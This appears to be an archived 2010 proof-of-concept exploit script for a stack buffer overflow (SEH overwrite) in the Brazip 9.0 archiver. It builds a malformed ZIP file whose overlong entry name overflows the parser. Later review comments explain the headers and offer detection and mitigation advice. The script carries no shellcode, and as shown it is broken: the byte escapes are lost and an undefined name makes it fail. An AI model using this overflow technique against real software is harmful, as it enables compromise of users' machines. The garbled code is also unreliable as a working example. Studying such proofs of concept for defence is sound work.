
# Title : Brazip 9.0 (.zip File) Buffer Overflow (SEH)
# Published : 2010-08-17
# Author : ItSecTeam


#!user/bin/python
######################################################################
# Brazip 9.0 (.zip File) BoF Poc (SEH) 
# Homepage  : www.brazip.com.br
# Version   : 9.0
# Tested Os : Windows XP SP1/SP3 EN 
# Usage     : $ Python Brazip-poc.py
######################################################################
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability60.htm
#Thanks: Hoshang jafari  aka [PLATEN]
######################################################################
import sys
# Proof-of-concept generator (Python 2 syntax): assembles a ZIP archive whose
# single entry carries a 4068-character file name and writes it to
# "Brazip-poc.zip". Per the header above, the overlong name is the input that
# overflows a stack buffer in Brazip 9.0 and reaches the SEH record.
#
# NOTE(review): the byte strings below read "x50x4B..." rather than
# "\x50\x4B..."; the escape backslashes appear to have been lost when the page
# was extracted, so as shown these are literal ASCII text, not raw bytes.
#
# Defender notes: the distinguishing artefact is an archive entry whose name is
# thousands of characters long and contains non-printable bytes. Scanners and
# mail/web gateways can flag ZIP entries whose names exceed platform path
# limits. General mitigations for this bug class are bounds-checked name
# handling in the parser plus SafeSEH/SEHOP, DEP and ASLR on the host.

# NOTE(review): __banner__ is not defined anywhere in this listing, so this
# line raises NameError before any file is written.
print __banner__

# Starts with the "PK" 03 04 signature of a ZIP local file header.
# The two-byte value e4 0f is 0x0fe4 = 4068 when read little-endian, which
# equals the final length of `payload` (4064 + len(".txt")); presumably the
# file-name length field -- confirm the offset against the ZIP specification.
header_1 =("x50x4Bx03x04x14x00x00"
"x00x00x00xB7xACxCEx34x00x00x00" 
"x00x00x00x00x00x00x00x00" 
"xe4x0f" 
"x00x00x00")
 
# Starts with the "PK" 01 02 signature of a ZIP central directory file header
# and repeats the same e4 0f length value.
header_2 = ("x50x4Bx01x02x14x00x14"
"x00x00x00x00x00xB7xACxCEx34x00x00x00" 
"x00x00x00x00x00x00x00x00x00"
"xe4x0f"
"x00x00x00x00x00x00x01x00"
"x24x00x00x00x00x00x00x00")
 
# Starts with the "PK" 05 06 signature of the ZIP end-of-central-directory
# record.
header_3 = ("x50x4Bx05x06x00x00x00"
"x00x01x00x01x00"
"x12x10x00x00"
"x02x10x00x00"
"x00x00")
# Two four-byte values placed directly after 297 filler characters. The names
# follow the usual labels for an SEH record (next-record pointer, handler
# address); nseh is four 0x41 bytes, i.e. a placeholder rather than code.
# NOTE(review): which module the seh address belongs to is not stated on the
# page.
nseh="x41x41x41x41"  
seh="x65x47x7ex6d"   

# 297 "A" characters of padding precede the two record values.
payload = "A" * 297 + nseh  + seh

# Five bytes the author labels "predecoder". Nothing but filler follows them
# ("B" and "C" characters), so this listing carries no shellcode.
predecoder = "x59x59x59x51x5c"
payload=payload+predecoder
# "B" padding so that predecoder plus padding spans 100 characters.
filltoebx="B" * (100-len(predecoder))
# "C" padding brings the name to 4064 characters; the ".txt" suffix makes the
# total 4068, matching the 0x0fe4 value embedded in header_1 and header_2.
rest = "C" *  (4064-len(payload+filltoebx)) + ".txt"
payload = payload+filltoebx+rest
# The same overlong name is placed after both the local file header and the
# central directory header, followed by the end-of-central-directory record.
exploit = header_1 + payload + header_2 + payload + header_3
 
try:
	# Writes the archive into the current working directory.
	f=open("Brazip-poc.zip",'w')
	f.write(exploit)
	f.close()
	print   "[+] File created successfully !" 
	# NOTE(review): sys.exit raises SystemExit, which the bare `except:` below
	# also catches, so the error message is printed even after a successful
	# write.
	sys.exit(0)
except:
	print "[-] Error cant write file to systemn"